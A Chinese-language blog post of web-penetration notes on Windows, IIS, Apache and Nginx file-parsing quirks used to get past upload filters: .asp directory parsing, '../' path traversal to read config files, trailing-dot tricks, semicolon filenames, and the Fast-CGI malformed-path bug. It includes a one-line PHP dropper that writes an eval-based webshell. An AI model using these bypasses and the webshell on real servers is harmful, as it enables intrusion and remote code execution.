windows和Linux服务器的一些相关特性
1.windows下的解析特性
1)win2003下面有一个致命的文件解析漏洞:
当我们在windows2003系统上建立一个文件夹的时候例如:建立名为1.asp的文件夹,然后只要是通过网址访问存在在这个文件夹的目录下的任何文件,被访问的文件都会被自动解析为.asp文件.比如说:如果在此文件夹下有一个1.gif文件,我们在访问的时候就相当于访问了1.gif.asp,所以此文件会被当成asp文件来访问。这样就给隐藏在图片中的木马带来了可乘之机。
2)windows下对…/的支持
例子:
http://qianlishe.com/1.php?id=1&u=2356&attach=11023.gif&filename=1.gif
在这个url中,1.php这个文件会把服务器上的11023.gif文件的内容返回到浏览器上,filename只是文件的名称。如果我们发一个请求,把变量attach构造为…/…/…/…/…/…/index.php/config.php,此时我们可以利用windows对…/的支持,来读取config.php类似的文件。
以上是…/在脚本文件中的应用。那么我们来看看在隐藏文件中的应用。
首先我们在cmd里面输入以下命令:md z…\ ,我们在相应的目录下查找发现我们并不能找到,同时也就进入不了文件夹。(这里解释一下md命令的意思是建立文件夹)。呢么我们如何进入这个文件夹呢?因为此目录在c盘下建立,所以我们输入:c:/z…,在这里我们利用了第一种的应用(…/返回上一级目录)
在这里解释一下:
在iis中,/和\是没有多大区别的,也就是说即使你输入了\,iis也会自动帮你解析成/,但是在脚本文件中,这两者是不同的,所以说如果过滤了/我们可以试一下\。
3)windows下对空格和的支持。
在windows下空格和.是会被忽略的,比如你建立一个文件1.jpg.,windows会把他当作1.jpg而忽略后面的空格和点。因此利用这个特性我们可以绕过许多限制。
4)关于apache解析问题
apache有一个致命的解析漏洞:那就是他会把1.php.rar解析成1.php。
5)不同的系统对大小写的敏感问题
在windows下对大小写不敏感。但是在Linux下对大小写敏感。
6)web容器为iis6.0 7.0 7.5
pent.php;2.jpg .jpg绕过了白名单,但是iis6.0会把文件当成php脚本来执行。
web容器有iis和apache
7)web容器为iis5.x/6.0
目录解析 以.asp为后缀的文件夹下面的文件无论文件名后缀是啥,都会被解析程asp脚本。
8)web容器为iis7.0/7.5/nignx <8.03畸形解析漏洞
在默认情况下,Fast—CGI开启的情况下,上传一个后缀为55.jpg文件,内容为<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>’);?>的文件,然后访问55.jpg/.php,在这个目录下会生成一句话木马shell.php。
2621
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
